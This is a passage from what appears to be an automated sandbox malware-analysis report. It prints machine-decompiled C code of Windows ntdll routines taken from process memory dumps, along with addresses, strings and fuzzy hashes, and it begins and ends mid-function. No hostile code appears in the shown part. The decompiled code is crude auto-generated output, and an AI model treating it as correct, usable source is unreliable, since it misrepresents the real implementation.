                                                              									_t30 = 0xc0000017;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t30;
                                                              			}









                                                              0x04ba1b8f
                                                              0x04ba1b9a
                                                              0x04ba1b9c
                                                              0x04ba1b9e
                                                              0x04ba1ba3
                                                              0x04bf7010
                                                              0x04bf7010
                                                              0x00000000
                                                              0x04ba1ba9
                                                              0x04ba1ba9
                                                              0x04ba1bae
                                                              0x00000000
                                                              0x04ba1bc5
                                                              0x04ba1bca
                                                              0x04ba1bcf
                                                              0x04ba1bd0
                                                              0x04ba1bd1
                                                              0x04ba1bd2
                                                              0x04ba1bd6
                                                              0x04ba1bdc
                                                              0x04ba1be0
                                                              0x04bf6ffc
                                                              0x04bf7000
                                                              0x00000000
                                                              0x04bf7006
                                                              0x04bf7009
                                                              0x04bf7009
                                                              0x04ba1be6
                                                              0x04ba1bec
                                                              0x04ba1c0b
                                                              0x04ba1c0b
                                                              0x04ba1c0c
                                                              0x04ba1c11
                                                              0x04ba1c12
                                                              0x04ba1c15
                                                              0x04ba1c1b
                                                              0x04ba1c1f
                                                              0x04ba1c31
                                                              0x04ba1c33
                                                              0x04bf7026
                                                              0x04bf7026
                                                              0x04ba1c21
                                                              0x04ba1c24
                                                              0x04ba1c24
                                                              0x04ba1bee
                                                              0x04ba1bee
                                                              0x04ba1bf2
                                                              0x04ba1c3a
                                                              0x04ba1bf4
                                                              0x04ba1bf4
                                                              0x04ba1c05
                                                              0x04ba1c05
                                                              0x04ba1c09
                                                              0x04ba1c3e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04ba1c09
                                                              0x04ba1bec
                                                              0x04ba1be0
                                                              0x04ba1bae
                                                              0x04ba1c2e

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: WindowsExcludedProcs
                                                              • API String ID: 0-3583428290
                                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction ID: e6b894ff0df3b444bea0abe51534ccc7793927d210214283d9e5b14d5d348160
                                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction Fuzzy Hash: 1621F536604228ABDB619EADC840FABB7ADEF40B50F0544E5FD048F200FA30FD1497A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 71%
                                                              			E04C48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				intOrPtr _t35;
                                                              				void* _t41;
                                                              
                                                              				_t40 = __esi;
                                                              				_t39 = __edi;
                                                              				_t38 = __edx;
                                                              				_t35 = __ecx;
                                                              				_t34 = __ebx;
                                                              				_push(0x74);
                                                              				_push(0x4c70d50);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                              				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                              					E04C25720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                              					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                              						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                              						asm("int3");
                                                              						 *(_t41 - 4) = 0xfffffffe;
                                                              					}
                                                              				}
                                                              				 *(_t41 - 4) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                              				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                              				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                              				 *((intOrPtr*)(_t41 - 0x64)) = L04BEDEF0;
                                                              				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                              				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                              				_push(_t41 - 0x70);
                                                              				L04BEDEF0(1, _t38);
                                                              				 *(_t41 - 4) = 0xfffffffe;
                                                              				return E04BED130(_t34, _t39, _t40);
                                                              			}





                                                              0x04c48df1
                                                              0x04c48df1
                                                              0x04c48df1
                                                              0x04c48df1
                                                              0x04c48df1
                                                              0x04c48df1
                                                              0x04c48df3
                                                              0x04c48df8
                                                              0x04c48dfd
                                                              0x04c48e00
                                                              0x04c48e0e
                                                              0x04c48e2a
                                                              0x04c48e36
                                                              0x04c48e38
                                                              0x04c48e3c
                                                              0x04c48e46
                                                              0x04c48e46
                                                              0x04c48e36
                                                              0x04c48e50
                                                              0x04c48e56
                                                              0x04c48e59
                                                              0x04c48e5c
                                                              0x04c48e60
                                                              0x04c48e67
                                                              0x04c48e6d
                                                              0x04c48e73
                                                              0x04c48e74
                                                              0x04c48eb1
                                                              0x04c48ebd

                                                              Strings
                                                              • Critical error detected %lx, xrefs: 04C48E21
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Critical error detected %lx
                                                              • API String ID: 0-802127002
                                                              • Opcode ID: b5146bdefa673a3ffceda06db38b8e6c4bca25afea98616d9c2847345c55e2a7
                                                              • Instruction ID: 1bd7bfacf5c452dc8e9a7ed6e4e993b7f60dc15b93bcf062a74ccf7ebb49363f
                                                              • Opcode Fuzzy Hash: b5146bdefa673a3ffceda06db38b8e6c4bca25afea98616d9c2847345c55e2a7
                                                              • Instruction Fuzzy Hash: 1F11ED79D00308EBEF24EFA586057ECBBB5BB44714F24425ED028AB282C3706602CF24
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04C2FF60
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                              • API String ID: 0-1911121157
                                                              • Opcode ID: b082c4e3de637bb753e529c0d5c4a75f8e9336fc94820bbf2794e29a914fc823
                                                              • Instruction ID: 5de126c92b617e41611e955fd36ecfb3a9135f4320f9b37c5ac9d45678fe53f2
                                                              • Opcode Fuzzy Hash: b082c4e3de637bb753e529c0d5c4a75f8e9336fc94820bbf2794e29a914fc823
                                                              • Instruction Fuzzy Hash: 6311C475550158EFEB12EF50CA48FA877F2FF48709F148098F5045B1A1C7B9BA40EB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E04C65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                              				signed int _t296;
                                                              				signed char _t298;
                                                              				signed int _t301;
                                                              				signed int _t306;
                                                              				signed int _t310;
                                                              				signed char _t311;
                                                              				intOrPtr _t312;
                                                              				signed int _t313;
                                                              				void* _t327;
                                                              				signed int _t328;
                                                              				intOrPtr _t329;
                                                              				intOrPtr _t333;
                                                              				signed char _t334;
                                                              				signed int _t336;
                                                              				void* _t339;
                                                              				signed int _t340;
                                                              				signed int _t356;
                                                              				signed int _t362;
                                                              				short _t367;
                                                              				short _t368;
                                                              				short _t373;
                                                              				signed int _t380;
                                                              				void* _t382;
                                                              				short _t385;
                                                              				signed short _t392;
                                                              				signed char _t393;
                                                              				signed int _t395;
                                                              				signed char _t397;
                                                              				signed int _t398;
                                                              				signed short _t402;
                                                              				void* _t406;
                                                              				signed int _t412;
                                                              				signed char _t414;
                                                              				signed short _t416;
                                                              				signed int _t421;
                                                              				signed char _t427;
                                                              				intOrPtr _t434;
                                                              				signed char _t435;
                                                              				signed int _t436;
                                                              				signed int _t442;
                                                              				signed int _t446;
                                                              				signed int _t447;
                                                              				signed int _t451;
                                                              				signed int _t453;
                                                              				signed int _t454;
                                                              				signed int _t455;
                                                              				intOrPtr _t456;
                                                              				intOrPtr* _t457;
                                                              				short _t458;
                                                              				signed short _t462;
                                                              				signed int _t469;
                                                              				intOrPtr* _t474;
                                                              				signed int _t475;
                                                              				signed int _t479;
                                                              				signed int _t480;
                                                              				signed int _t481;
                                                              				short _t485;
                                                              				signed int _t491;
                                                              				signed int* _t494;
                                                              				signed int _t498;
                                                              				signed int _t505;
                                                              				intOrPtr _t506;
                                                              				signed short _t508;
                                                              				signed int _t511;
                                                              				void* _t517;
                                                              				signed int _t519;
                                                              				signed int _t522;
                                                              				void* _t523;
                                                              				signed int _t524;
                                                              				void* _t528;
                                                              				signed int _t529;
                                                              
                                                              				_push(0xd4);
                                                              				_push(0x4c71178);
                                                              				E04BED0E8(__ebx, __edi, __esi);
                                                              				_t494 = __edx;
                                                              				 *(_t528 - 0xcc) = __edx;
                                                              				_t511 = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                              				 *(_t528 - 0xbc) = __ecx;
                                                              				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                              				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                              				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                              				_t427 = 0;
                                                              				 *(_t528 - 0x74) = 0;
                                                              				 *(_t528 - 0x9c) = 0;
                                                              				 *(_t528 - 0x84) = 0;
                                                              				 *(_t528 - 0xac) = 0;
                                                              				 *(_t528 - 0x88) = 0;
                                                              				 *(_t528 - 0xa8) = 0;
                                                              				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                              				if( *(_t528 + 0x1c) <= 0x80) {
                                                              					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                              					if(__eflags != 0) {
                                                              						_t421 = E04C64C56(0, __edx, __ecx, __eflags);
                                                              						__eflags = _t421;
                                                              						if(_t421 != 0) {
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                              							E04BDD000(0x410);
                                                              							 *(_t528 - 0x18) = _t529;
                                                              							 *(_t528 - 0x9c) = _t529;
                                                              							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                              							E04C65542(_t528 - 0x9c, _t528 - 0x84);
                                                              						}
                                                              					}
                                                              					_t435 = _t427;
                                                              					 *(_t528 - 0xd0) = _t435;
                                                              					_t474 = _t511 + 0x65;
                                                              					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                              					_t511 = 0x18;
                                                              					while(1) {
                                                              						 *(_t528 - 0xa0) = _t427;
                                                              						 *(_t528 - 0xbc) = _t427;
                                                              						 *(_t528 - 0x80) = _t427;
                                                              						 *(_t528 - 0x78) = 0x50;
                                                              						 *(_t528 - 0x79) = _t427;
                                                              						 *(_t528 - 0x7a) = _t427;
                                                              						 *(_t528 - 0x8c) = _t427;
                                                              						 *(_t528 - 0x98) = _t427;
                                                              						 *(_t528 - 0x90) = _t427;
                                                              						 *(_t528 - 0xb0) = _t427;
                                                              						 *(_t528 - 0xb8) = _t427;
                                                              						_t296 = 1 << _t435;
                                                              						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                              						__eflags = _t436 & _t296;
                                                              						if((_t436 & _t296) != 0) {
                                                              							goto L92;
                                                              						}
                                                              						__eflags =  *((char*)(_t474 - 1));
                                                              						if( *((char*)(_t474 - 1)) == 0) {
                                                              							goto L92;
                                                              						}
                                                              						_t301 =  *_t474;
                                                              						__eflags = _t494[1] - _t301;
                                                              						if(_t494[1] <= _t301) {
                                                              							L10:
                                                              							__eflags =  *(_t474 - 5) & 0x00000040;
                                                              							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                              								L12:
                                                              								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                              								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                              									goto L92;
                                                              								}
                                                              								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                              								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                              								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                              									goto L92;
                                                              								}
                                                              								__eflags = _t442 -  *(_t474 - 0x11);
                                                              								if(_t442 !=  *(_t474 - 0x11)) {
                                                              									goto L92;
                                                              								}
                                                              								L15:
                                                              								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                              								 *(_t528 - 0xc0) = _t306;
                                                              								 *(_t528 - 0xa4) = _t306;
                                                              								__eflags =  *0x4c860e8;
                                                              								if( *0x4c860e8 != 0) {
                                                              									__eflags = _t306 - 0x40;
                                                              									if(_t306 < 0x40) {
                                                              										L20:
                                                              										asm("lock inc dword [eax]");
                                                              										_t310 =  *0x4c860e8; // 0x0
                                                              										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                              										__eflags = _t311 & 0x00000001;
                                                              										if((_t311 & 0x00000001) == 0) {
                                                              											 *(_t528 - 0xa0) = _t311;
                                                              											_t475 = _t427;
                                                              											 *(_t528 - 0x74) = _t427;
                                                              											__eflags = _t475;
                                                              											if(_t475 != 0) {
                                                              												L91:
                                                              												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                              												goto L92;
                                                              											}
                                                              											asm("sbb edi, edi");
                                                              											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                              											_t511 = _t498;
                                                              											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                              											__eflags =  *(_t312 - 5) & 1;
                                                              											if(( *(_t312 - 5) & 1) != 0) {
                                                              												_push(_t528 - 0x98);
                                                              												_push(0x4c);
                                                              												_push(_t528 - 0x70);
                                                              												_push(1);
                                                              												_push(0xfffffffa);
                                                              												_t412 = E04BD9710();
                                                              												_t475 = _t427;
                                                              												__eflags = _t412;
                                                              												if(_t412 >= 0) {
                                                              													_t414 =  *(_t528 - 0x98) - 8;
                                                              													 *(_t528 - 0x98) = _t414;
                                                              													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                              													 *(_t528 - 0x8c) = _t416;
                                                              													 *(_t528 - 0x79) = 1;
                                                              													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                              											__eflags = _t446 & 0x00000004;
                                                              											if((_t446 & 0x00000004) != 0) {
                                                              												__eflags =  *(_t528 - 0x9c);
                                                              												if( *(_t528 - 0x9c) != 0) {
                                                              													 *(_t528 - 0x7a) = 1;
                                                              													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                              													__eflags = _t511;
                                                              												}
                                                              											}
                                                              											_t313 = 2;
                                                              											_t447 = _t446 & _t313;
                                                              											__eflags = _t447;
                                                              											 *(_t528 - 0xd4) = _t447;
                                                              											if(_t447 != 0) {
                                                              												_t406 = 0x10;
                                                              												_t511 = _t511 + _t406;
                                                              												__eflags = _t511;
                                                              											}
                                                              											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                              											 *(_t528 - 0x88) = _t427;
                                                              											__eflags =  *(_t528 + 0x1c);
                                                              											if( *(_t528 + 0x1c) <= 0) {
                                                              												L45:
                                                              												__eflags =  *(_t528 - 0xb0);
                                                              												if( *(_t528 - 0xb0) != 0) {
                                                              													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              													__eflags = _t511;
                                                              												}
                                                              												__eflags = _t475;
                                                              												if(_t475 != 0) {
                                                              													asm("lock dec dword [ecx+edx*8+0x4]");
                                                              													goto L100;
                                                              												} else {
                                                              													_t494[3] = _t511;
                                                              													_t451 =  *(_t528 - 0xa0);
                                                              													_t427 = E04BD6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                              													 *(_t528 - 0x88) = _t427;
                                                              													__eflags = _t427;
                                                              													if(_t427 == 0) {
                                                              														__eflags = _t511 - 0xfff8;
                                                              														if(_t511 <= 0xfff8) {
                                                              															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                              															asm("sbb ecx, ecx");
                                                              															__eflags = (_t451 & 0x000000e2) + 8;
                                                              														}
                                                              														asm("lock dec dword [eax+edx*8+0x4]");
                                                              														L100:
                                                              														goto L101;
                                                              													}
                                                              													_t453 =  *(_t528 - 0xa0);
                                                              													 *_t494 = _t453;
                                                              													_t494[1] = _t427;
                                                              													_t494[2] =  *(_t528 - 0xbc);
                                                              													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                              													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                              													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                              													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x14);
                                                              													if( *(_t528 + 0x14) == 0) {
                                                              														__eflags =  *[fs:0x18] + 0xf50;
                                                              													}
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													asm("movsd");
                                                              													__eflags =  *(_t528 + 0x18);
                                                              													if( *(_t528 + 0x18) == 0) {
                                                              														_t454 =  *(_t528 - 0x80);
                                                              														_t479 =  *(_t528 - 0x78);
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													} else {
                                                              														_t146 = _t427 + 0x50; // 0x50
                                                              														_t454 = _t146;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t382 = 0x18;
                                                              														 *_t454 = _t382;
                                                              														 *((short*)(_t454 + 2)) = 1;
                                                              														_t385 = 0x10;
                                                              														 *((short*)(_t454 + 6)) = _t385;
                                                              														 *(_t454 + 4) = 0;
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														asm("movsd");
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = 0x68;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x79) - _t327;
                                                              													if( *(_t528 - 0x79) == _t327) {
                                                              														_t524 = _t479 + _t427;
                                                              														_t508 =  *(_t528 - 0x8c);
                                                              														 *_t524 = _t508;
                                                              														_t373 = 2;
                                                              														 *((short*)(_t524 + 2)) = _t373;
                                                              														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                              														 *((short*)(_t524 + 4)) = 0;
                                                              														_t167 = _t524 + 8; // 0x8
                                                              														E04BDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t380 =  *(_t528 - 0x80);
                                                              														__eflags = _t380;
                                                              														if(_t380 != 0) {
                                                              															_t173 = _t380 + 4;
                                                              															 *_t173 =  *(_t380 + 4) | 1;
                                                              															__eflags =  *_t173;
                                                              														}
                                                              														_t454 = _t524;
                                                              														 *(_t528 - 0x80) = _t454;
                                                              														_t327 = 1;
                                                              														__eflags = 1;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xd4);
                                                              													if( *(_t528 - 0xd4) == 0) {
                                                              														_t505 =  *(_t528 - 0x80);
                                                              													} else {
                                                              														_t505 = _t479 + _t427;
                                                              														_t523 = 0x10;
                                                              														 *_t505 = _t523;
                                                              														_t367 = 3;
                                                              														 *((short*)(_t505 + 2)) = _t367;
                                                              														_t368 = 4;
                                                              														 *((short*)(_t505 + 6)) = _t368;
                                                              														 *(_t505 + 4) = 0;
                                                              														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                              														_t327 = 1;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 = _t479 + _t523;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t454;
                                                              														if(_t454 != 0) {
                                                              															_t186 = _t454 + 4;
                                                              															 *_t186 =  *(_t454 + 4) | 1;
                                                              															__eflags =  *_t186;
                                                              														}
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0x7a) - _t327;
                                                              													if( *(_t528 - 0x7a) == _t327) {
                                                              														 *(_t528 - 0xd4) = _t479 + _t427;
                                                              														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                              														E04BDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + _t522;
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t199 = _t505 + 4;
                                                              															 *_t199 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t199;
                                                              														}
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														 *(_t528 - 0x80) = _t505;
                                                              													}
                                                              													__eflags =  *(_t528 - 0xa8);
                                                              													if( *(_t528 - 0xa8) != 0) {
                                                              														_t356 = _t479 + _t427;
                                                              														 *(_t528 - 0xd4) = _t356;
                                                              														_t462 =  *(_t528 - 0xac);
                                                              														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                              														_t485 = 0xc;
                                                              														 *((short*)(_t356 + 2)) = _t485;
                                                              														 *(_t356 + 6) = _t462;
                                                              														 *((short*)(_t356 + 4)) = 0;
                                                              														_t211 = _t356 + 8; // 0x9
                                                              														E04BDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                              														E04BDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0x18;
                                                              														_t427 =  *(_t528 - 0x88);
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t505 =  *(_t528 - 0xd4);
                                                              														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														_t362 =  *(_t528 - 0x80);
                                                              														__eflags = _t362;
                                                              														if(_t362 != 0) {
                                                              															_t222 = _t362 + 4;
                                                              															 *_t222 =  *(_t362 + 4) | 1;
                                                              															__eflags =  *_t222;
                                                              														}
                                                              													}
                                                              													__eflags =  *(_t528 - 0xb0);
                                                              													if( *(_t528 - 0xb0) != 0) {
                                                              														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                              														_t458 = 0xb;
                                                              														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                              														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                              														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                              														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                              														E04BDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                              														_t529 = _t529 + 0xc;
                                                              														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                              														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                              														 *(_t528 - 0x78) = _t479;
                                                              														__eflags = _t505;
                                                              														if(_t505 != 0) {
                                                              															_t241 = _t505 + 4;
                                                              															 *_t241 =  *(_t505 + 4) | 1;
                                                              															__eflags =  *_t241;
                                                              														}
                                                              													}
                                                              													_t328 =  *(_t528 + 0x1c);
                                                              													__eflags = _t328;
                                                              													if(_t328 == 0) {
                                                              														L87:
                                                              														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                              														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                              														_t455 =  *(_t528 - 0xdc);
                                                              														 *(_t427 + 0x14) = _t455;
                                                              														_t480 =  *(_t528 - 0xa0);
                                                              														_t517 = 3;
                                                              														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                              														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                              															asm("rdtsc");
                                                              															 *(_t427 + 0x3c) = _t480;
                                                              														} else {
                                                              															 *(_t427 + 0x3c) = _t455;
                                                              														}
                                                              														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                              														_t456 =  *[fs:0x18];
                                                              														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                              														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                              														_t427 = 0;
                                                              														__eflags = 0;
                                                              														_t511 = 0x18;
                                                              														goto L91;
                                                              													} else {
                                                              														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                              														__eflags = _t519;
                                                              														 *(_t528 - 0x8c) = _t328;
                                                              														do {
                                                              															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                              															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                              															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                              															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                              															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                              															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                              																_t334 =  *_t519;
                                                              															} else {
                                                              																_t334 = 0;
                                                              															}
                                                              															_t336 = _t334 & 0x000000ff;
                                                              															__eflags = _t336;
                                                              															_t427 =  *(_t528 - 0x88);
                                                              															if(_t336 == 0) {
                                                              																_t481 = _t479 + _t506;
                                                              																__eflags = _t481;
                                                              																 *(_t528 - 0x78) = _t481;
                                                              																E04BDF3E0(_t479 + _t427, _t457, _t506);
                                                              																_t529 = _t529 + 0xc;
                                                              															} else {
                                                              																_t340 = _t336 - 1;
                                                              																__eflags = _t340;
                                                              																if(_t340 == 0) {
                                                              																	E04BDF3E0( *(_t528 - 0xb8), _t457, _t506);
                                                              																	_t529 = _t529 + 0xc;
                                                              																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                              																} else {
                                                              																	__eflags = _t340 == 0;
                                                              																	if(_t340 == 0) {
                                                              																		__eflags = _t506 - 8;
                                                              																		if(_t506 == 8) {
                                                              																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                              																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              															_t339 = 0x10;
                                                              															_t519 = _t519 + _t339;
                                                              															_t263 = _t528 - 0x8c;
                                                              															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                              															__eflags =  *_t263;
                                                              															_t479 =  *(_t528 - 0x78);
                                                              														} while ( *_t263 != 0);
                                                              														goto L87;
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                              												 *(_t528 - 0xa2) = _t392;
                                                              												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                              												__eflags = _t469;
                                                              												while(1) {
                                                              													 *(_t528 - 0xe4) = _t511;
                                                              													__eflags = _t392;
                                                              													_t393 = _t427;
                                                              													if(_t392 != 0) {
                                                              														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                              													}
                                                              													_t395 = (_t393 & 0x000000ff) - _t427;
                                                              													__eflags = _t395;
                                                              													if(_t395 == 0) {
                                                              														_t511 = _t511 +  *_t469;
                                                              														__eflags = _t511;
                                                              													} else {
                                                              														_t398 = _t395 - 1;
                                                              														__eflags = _t398;
                                                              														if(_t398 == 0) {
                                                              															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                              															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                              														} else {
                                                              															__eflags = _t398 == 1;
                                                              															if(_t398 == 1) {
                                                              																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                              																_t402 =  *_t469 & 0x0000ffff;
                                                              																 *(_t528 - 0xac) = _t402;
                                                              																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                              															}
